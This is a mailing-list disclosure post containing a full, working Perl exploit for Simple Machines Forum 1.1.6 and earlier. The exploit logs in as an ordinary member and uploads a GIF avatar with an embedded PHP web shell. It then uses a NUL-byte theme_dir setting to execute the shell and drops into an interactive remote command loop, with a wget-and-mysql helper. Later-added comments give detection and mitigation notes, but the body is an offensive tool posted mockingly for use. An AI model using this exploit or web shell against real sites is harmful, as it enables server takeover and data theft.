Message-Id: <20081106035719.837932803B@smtp.hushmail.com>
Date: Wed, 05 Nov 2008 22:57:19 -0500
From: elmysterio@...hmail.com
To: full-disclosure@...ts.grok.org.uk
Subject: [0day] Simple Machines Forum * <= 1.1.6 Code
	Execution

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

#!/usr/bin/perl
#
# @title: Simple Machines Forum Code Execution
# @versn: * <= 1.1.6
# @authr: ~elmysterio ( a.k.a us )
# @stats: DROPPED!!!!!!!
# @descp: In loving memory of the rare bone marrow disease that
killed rgod.
#         We can't thank you enough for killing a bug killer.
# @bug  : Sources/QueryString.php  & Sources/Themes.php w/
magic_quotes == Off
# @gr33t: m0rt's failure,  it never stops.
#
# C:\Documents and Settings\molest>perl
P:\advisories\smf\smf_localfileinclude.pl
# -s http://localhost/audit/smf116 -u regular -p test -d
# [ii] 0day Simple Machines Forum <= 1.1.6 Code Execution
# [ii] Session ID = e6abb52c4dc7fd4ecd7b307f66e9cd9d
# [ii] User Id = 2
# [ii] Uploaded a shell...
# [cmd@...32]$ ver
#
# Microsoft Windows XP [Version 5.1.2600]
#
# [cmd@...32]$
#
#  FOR LULZ PURPOSE ONLY!!
#
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
use Getopt::Long qw(:config no_ignore_case);

# Banner printed on every run; the same string appears in the sample
# transcript in the header comment.
print "[ii] 0day Simple Machines Forum <= 1.1.6 Code Execution\n";

# HTTP client with an in-memory cookie jar, so the forum login session is
# carried over to the later requests. The User-Agent is a fixed literal, which
# makes it a usable indicator when reviewing web-server access logs.
# NOTE(review): the list archive hard-wrapped long lines, so several string
# literals and statements in this listing are split across lines; the code is
# kept exactly as archived.
my $ua = LWP::UserAgent->new( cookie_jar => {}, agent => "Mozilla
FireFox" );
# Option defaults: s = base URL of the forum, d = debug output flag,
# x = callback that routes HTTP traffic through the given proxy,
# u / p = forum account used by the login request further down.
my %parms = (	s => "",
        		d => 0,
        		x => sub { print "[**] Proxy found, using $_[1]\n"; $ua-
>proxy(['http'], $_[1]); },
        		u => "Gl0ria!!!",
        		p => "gl0ria\@herb3st" );

# Command-line values override the defaults above (case-sensitive switches,
# per the Getopt::Long import options).
GetOptions \%parms, "s=s", "d", "x=s", "u=s", "p=s";

# No site given: print the usage text and stop.
if( !$parms{s} ) {
		die <<HELP
[ii] usage: $0 <parms>
	[-s]    Site        -> http://site.com/forums
	[-x]	Proxy       -> localhost:8118
	[-u]	Username    -> Gl0ria!!!
	[-p]    Password    -> gl0ria\@herb3st
	[-d]    Debug
HELP
}

# Builds the avatar upload body as one string: the bytes "GIF89a" plus
# further binary data, then a block of PHP, then more binary data that ends
# in GIF structures (0x21 0xf9 graphic control extension, 0x2c image
# descriptor, 0x3b trailer). Starting with the GIF magic is presumably what
# lets the file pass as an avatar image -- the server-side check is not
# visible in this listing.
#
# Defender notes, taken from the embedded PHP below:
#   * input is read from $_SERVER[HTTP_SERVER_INFO], i.e. a request header,
#     so nothing appears in the URL or the POST body;
#   * the header value is passed to eval() or passthru();
#   * output is wrapped in the fixed markers '---1243---' / '---3421---',
#     and the probe value '0998' is answered with '---info---' markers;
#   * an uploaded "image" that contains '<?php' is an indicator by itself.
# Re-encoding uploaded images and keeping the upload directory out of reach
# of include()/require() removes the precondition this payload relies on.
my $shell =
chr(0x47).chr(0x49).chr(0x46).chr(0x38).chr(0x39).chr(0x61).
			chr(0x01).chr(0x00).chr(0x01).chr(0x00).chr(0xf7).chr(0x00).
			chr(0x00).chr(0xa4).chr(0xb6).chr(0xa4).chr(0x16).chr(0x00).
			chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0x6b).chr(0x00).chr(0x4c).chr(0x15).chr(0x00).
			chr(0x00).chr(0xf4).chr(0x00).chr(0x69).chr(0x77).chr(0x00).
			chr(0x00).chr(0xf8).chr(0x00).chr(0x6e).chr(0x62).chr(0x00).
			chr(0x00).chr(0x15).chr(0x00).chr(0x67).chr(0x00).chr(0x00).
			chr(0x00).chr(0x34).chr(0x00).chr(0x75).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x61).chr(0xc0).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x89).chr(0x00).chr(0x00).chr(0x1c).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0xa9).chr(0x00).chr(0x00).chr(0x20).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x6f).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x56).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00); $shell .= <<'EXIF';
<?php
 error_reporting(0);ini_set('max_execution_time',0);
 $x=trim(stripslashes($_SERVER[HTTP_SERVER_INFO]));$z=(ini_get('safe
_mode') or strpos(ini_get('disable_functions'),'passthru') ? '1' :
'0');
 if($x=='0998'){print '---info---'.PHP_OS.';'.$z.'---info---';exit;}
 print '---1243---';if($z){print eval($x);}else{print
passthru($x);}print '---3421---';exit;
?>
EXIF
			$shell .= chr(0x38).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).
			chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x98).chr(0x01).chr(0x00).
			chr(0xcc).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).
			chr(0x00).chr(0x58).chr(0x00).chr(0x10).chr(0xe6).chr(0x00).
			chr(0x04).chr(0x12).chr(0x00).chr(0x10).chr(0x00).chr(0x00).
			chr(0x04).chr(0x05).chr(0x00).chr(0x01).chr(0x90).chr(0x00).
			chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0xc8).chr(0x00).chr(0x10).chr(0xd5).chr(0x00).
			chr(0xe8).chr(0xf5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).
			chr(0x00).chr(0xff).chr(0x00).chr(0x13).chr(0xff).chr(0x00).
			chr(0x6c).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).
			chr(0x74).chr(0x6a).chr(0x00).chr(0x03).chr(0x16).chr(0x00).
			chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0xc4).chr(0x00).chr(0x30).chr(0x1e).chr(0x00).
			chr(0x75).chr(0xe5).chr(0x00).chr(0x15).chr(0x77).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x15).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0xdc).chr(0x00).chr(0x00).
			chr(0xe7).chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).
			chr(0x00).chr(0x70).chr(0x00).chr(0x01).chr(0x59).chr(0x00).
			chr(0x00).chr(0x18).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x04).chr(0x00).chr(0x88).chr(0x01).chr(0x00).
			chr(0xe8).chr(0x05).chr(0x00).chr(0x12).chr(0x01).chr(0x00).
			chr(0x00).chr(0x6c).chr(0x00).chr(0x04).chr(0xe3).chr(0x00).
			chr(0x42).chr(0x12).chr(0x00).chr(0x6e).chr(0x00).chr(0x00).
			chr(0x74).chr(0x7e).chr(0x00).chr(0x30).chr(0x00).chr(0x00).
			chr(0x87).chr(0x00).chr(0x00).chr(0x6e).chr(0xc0).chr(0x00).
			chr(0x74).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
			chr(0xff).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
			chr(0xff).chr(0xff).chr(0x00).chr(0xd6).chr(0xff).chr(0x00).
			chr(0x32).chr(0xff).chr(0x00).chr(0x6e).chr(0xff).chr(0x00).
			chr(0x74).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).
			chr(0x5b).chr(0xff).chr(0x00).chr(0xe5).chr(0xff).chr(0x00).
			chr(0x77).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).
			chr(0x15).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x07).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x6b).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x58).chr(0x00).chr(0x00).chr(0x03).chr(0x00).
			chr(0xf0).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).
			chr(0x00).chr(0x06).chr(0x00).chr(0x00).chr(0xf6).chr(0x00).
			chr(0x00).chr(0xe4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0x0f).chr(0x00).chr(0x00).chr(0x1e).chr(0x00).
			chr(0x00).chr(0xe5).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0xf8).chr(0x74).chr(0x00).chr(0x62).chr(0xe7).
			chr(0x00).chr(0x01).chr(0x12).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0xc8).chr(0x68).chr(0x00).chr(0x28).
			chr(0x32).chr(0x15).chr(0xe5).chr(0xe6).chr(0x00).chr(0x77).
			chr(0x77).chr(0xa4).chr(0x00).chr(0xff).chr(0xe5).chr(0x00).
			chr(0xff).chr(0x12).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
			chr(0xff).chr(0x00).chr(0x00).chr(0x6c).chr(0x00).chr(0x00).
			chr(0x5b).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).
			chr(0x77).chr(0xfc).chr(0xf8).chr(0x36).chr(0xf7).chr(0x62).
			chr(0x00).chr(0x12).chr(0x15).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x05).chr(0x00).chr(0x36).chr(0x90).chr(0x01).
			chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0xc8).chr(0x04).chr(0xd8).chr(0xd5).chr(0x29).
			chr(0xed).chr(0xf5).chr(0xe5).chr(0x12).chr(0x77).chr(0x77).
			chr(0x00).chr(0xff).chr(0x94).chr(0xff).chr(0xff).chr(0xe7).
			chr(0xff).chr(0xff).chr(0x12).chr(0xff).chr(0xff).chr(0x00).
			chr(0xff).chr(0x6a).chr(0x64).chr(0x00).chr(0x16).chr(0x2f).
			chr(0x00).chr(0xf4).chr(0xe6).chr(0x00).chr(0x77).chr(0x77).
			chr(0x00).chr(0xe0).chr(0x00).chr(0x9c).chr(0x18).chr(0x00).
			chr(0xe8).chr(0xe5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).
			chr(0x00).chr(0x00).chr(0xff).chr(0x4e).chr(0x00).chr(0xff).
			chr(0x21).chr(0x15).chr(0xff).chr(0x4c).chr(0x00).chr(0xff).
			chr(0x00).chr(0x00).chr(0x6f).chr(0x7c).chr(0x00).chr(0x10).
			chr(0xe8).chr(0x00).chr(0xe5).chr(0x12).chr(0x00).chr(0x77).
			chr(0x00).chr(0xf8).chr(0x00).chr(0x7b).chr(0x62).chr(0x00).
			chr(0xe0).chr(0x15).chr(0x00).chr(0x4e).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x98).chr(0xb0).chr(0x01).chr(0xe8).
			chr(0xe8).chr(0x00).chr(0x12).chr(0x12).chr(0x00).chr(0x00).
			chr(0x00).chr(0x64).chr(0x98).chr(0x6f).chr(0x2f).chr(0x10).
			chr(0x10).chr(0xe6).chr(0xe5).chr(0xe5).chr(0x77).chr(0x77).
			chr(0x77).chr(0x00).chr(0x10).chr(0x52).chr(0x00).chr(0xe4).
			chr(0xe9).chr(0x00).chr(0x4e).chr(0x12).chr(0x00).chr(0x00).
			chr(0x00).chr(0x61).chr(0x20).chr(0xc8).chr(0x00).chr(0x02).
			chr(0xff).chr(0x6c).chr(0x4f).chr(0xff).chr(0x00).chr(0x00).
			chr(0x7f).chr(0x69).chr(0x00).chr(0x1c).chr(0x00).chr(0x01).
			chr(0xe9).chr(0x61).chr(0x00).chr(0x12).chr(0x00).chr(0x00).
			chr(0x00).chr(0x29).chr(0x94).chr(0x00).chr(0x00).chr(0xe7).
			chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x6f).chr(0x00).chr(0x01).
			chr(0x10).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).
			chr(0x77).chr(0x00).chr(0xa0).chr(0x00).chr(0x00).chr(0x3a).
			chr(0x00).chr(0x00).chr(0x50).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x30).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x69).
			chr(0x00).chr(0x00).chr(0x61).chr(0x60).chr(0x00).chr(0x74).
			chr(0xf1).chr(0x00).chr(0x74).chr(0x15).chr(0x00).chr(0x69).
			chr(0x00).chr(0x00).chr(0x00).chr(0xf0).chr(0x00).chr(0x00).
			chr(0xaa).chr(0x00).chr(0x02).chr(0x47).chr(0x00).chr(0x00).
			chr(0x00).chr(0x21).chr(0xf9).chr(0x04).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x2c).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x01).chr(0x00).
			chr(0x07).chr(0x08).chr(0x04).chr(0x00).chr(0x01).chr(0x04).
			chr(0x04).chr(0x00).chr(0x3b).chr(0x00);

## Logging in
# Posts the account name and password to action=login2; the session cookie
# lands in the client's cookie jar. Everything after this point runs as an
# ordinary logged-in member -- no administrative rights are requested
# anywhere in this listing.
my $ret = $ua->post("$parms{s}/index.php?action=login2",
		[
			user			=> $parms{u},
			passwrd			=> $parms{p},
			cookielength	=> -1
		]);

## Getting id, sid and checking to see if we're logged on
$ret = $ua->get("$parms{s}/index.php?action=profile");

# The profile page is used as the login check: the "does not exist" message
# is taken to mean the login failed.
die "[!!] Wrong username/password\n"
	unless $ret->as_string !~ /The user whose profile you are trying
to view does not exist/;

# Session check value: a 32-character lowercase hex token after 'sesc='.
die "[!!] Error getting session id\n"
	unless my($sid) = $ret->as_string =~ /sesc=([a-z0-9]{32})/;

# Numeric member id, taken from the first 'u=<digits>;' in the response.
die "[!!] Error getting id\n"
	unless my($id) = $ret->as_string =~ /u=(\d+);/;

print "[ii] Session ID = $sid\n".
      "[ii] User Id = $id\n" if $parms{d};

## Checking for shell
# Probe request against action=theme;sa=pick with a marker command in the
# SERVER_INFO header field (LWP normally puts this on the wire as
# 'Server-Info'). A request carrying that header to index.php is not part of
# normal forum traffic and is worth alerting on.
$ret = $ua-
>get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}"
, SERVER_INFO => "echo expl0ited");

# Marker echoed back: the payload from an earlier run is already active, so
# the upload steps are skipped.
&shell
	if $ret->as_string =~ /expl0ited/;

# Avatar upload through the regular profile form (action=profile2). The file
# name and the declared image/gif type are chosen by the client; a server
# that trusts either without re-encoding the image stores the embedded PHP
# as-is. The literal file name 'expl0ited.gif' is a log indicator.
$ret = $ua->request(
		POST "$parms{s}/index.php?action=profile2",
		Content_Type	=> 'multipart/form-data',
		Content			=>
		[
			avatar_choice	=> "upload",
			sc				=> $sid,
			userID			=> $id,
			sa				=> "forumProfile",
			attachment		=>
			[
				undef,
				"expl0ited.gif",
				Content         => $shell,
				"Content-Type"	=> "image/gif"
			]
		]);

## Updating Settings.php
# Uses action=jsoption to set the option named theme_dir to the uploaded
# avatar's path followed by an encoded NUL ('%2500'). The header comment
# attributes the flaw to Sources/QueryString.php and Sources/Themes.php with
# magic_quotes off, and gives the affected versions as <= 1.1.6.
# Detection: any jsoption request with var=theme_dir, or a 'val' containing
# %00 / %2500 or a path into attachments/.
# Mitigation: upgrade past the affected versions; do not let per-user
# options name include paths; PHP 5.3.4 and later reject NUL bytes in
# filesystem paths, which blocks this kind of path truncation.
$ret = $ua-
>get("$parms{s}/index.php?action=jsoption;sesc=${sid};th=32;var=them
e_dir;val=./attachments/avatar_${id}.gif\%2500");

print "[ii] Uploaded a shell...\n"
    if $parms{d};

shell();

## lulz @ this shit.
# Interactive loop that relays operator input to the uploaded payload and
# prints what comes back. Takes no arguments; it reads the file-level $ua,
# %parms, $id, $sid and $ret, and always ends the process with exit.
#
# Defender notes: every relayed command is a GET to
# index.php?action=theme;sa=pick with the command text in the SERVER_INFO
# request header, so access logs that record only the URL show repeated,
# identical-looking requests. Logging request headers, or alerting on the
# '---1243---' / '---3421---' markers in responses, exposes the traffic.
sub shell {
	my ($full,$base,$user,$pass,$file,$cmd,$os,$sh);
    # Ask the payload for its environment summary using the probe value.
    $ret = $ua-
>get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}"
, SERVER_INFO => '0998' );
    # Expected reply shape: '---info---<PHP_OS>;<flag>---info---'.
    ($os,$sh) = $ret->as_string =~ /---info---(.*?);(\d?)---info---
/s;

	# A missing info reply is reported as magic_quotes being enabled, which
	# matches the precondition named in the header comment
	# (magic_quotes == Off).
	die "[!!] magic_quotes is turned on\n"
		if (not defined $os or not defined $sh or $1 eq $id);

    # Prompt labels only: flag set -> "php", otherwise "cmd"; OS string
    # containing "win" -> "win32", otherwise "unix".
    $sh = $sh ? "php" : "cmd";
    $os = $os =~ /win/i ? "win32" : "unix";

    do {
		print "[$sh\@$os]\$ ";
		$cmd = chomp (my $cmd = <STDIN>);


		exit
			unless $cmd !~ /^exit$/i;

        # 'savefile <name> ' prefix: remember a local file name for logging
        # and strip the prefix from the command.
        if( ($file) = $cmd =~ /^savefile (.*?) / ) {
            $cmd =~ s/savefile $1 //;
        } else { undef $file; }

        # 'mysql <user> <pass> <url>' shorthand: replaced by a command line
        # that changes into attachments/, fetches the URL with wget, feeds
        # the file to the mysql client and deletes it. Host artefacts to look
        # for: wget or mysql processes started by the web-server user, and
        # short-lived files in the attachments directory.
        if( ($user,$pass,$full) = $cmd =~ /^mysql (.*?) (.*?)
(.*?)$/ ) {
            ($base) = $full =~ /\/(.*?)$/;
            $cmd = "cd attachments;wget $full; mysql --user=$user --
password=$pass < $base; rm $base;";
        }

        # Relay the command in the SERVER_INFO header and print whatever the
        # response holds between the two output markers.
        $ret = $ua-
>get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}"
, SERVER_INFO => $cmd);
        $ret->as_string =~ /---1243---(.*?)---3421---/s;
        print "$1\n";

        # Optional local transcript: appends the command, the target URL and
        # the captured output to the file named with 'savefile'.
        if( defined $file ) {
            open FILE, ">>", $file or die "[!!] Error writing to
file; $!\n";
            print FILE "Command Executed: $cmd\n".
                       "Host: $parms{s}\n$1\n";
            close FILE;
        }
	} while( $cmd !~ /^exit$/i );

	exit;
}
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQMCAAYFAkkSax8ACgkQxKkly4PzmN6NRwP/eL/Q6zKYoeuNmOlPk8QMesJjVUu5
oe+zFmLwOBexDYI0JRSUqPSyDglh9JsD270gwLMzwoE1jeg8tmeLtI6QmgTIXL+D0e6X
S/XQ+UFA6+2lq5QwGSOZpstbQAqgvM/rmynP0ayeu23Gmk9yMiOq32jgHRiBRDl1S/EW
6uD17+4=
=/Wd7
-----END PGP SIGNATURE-----


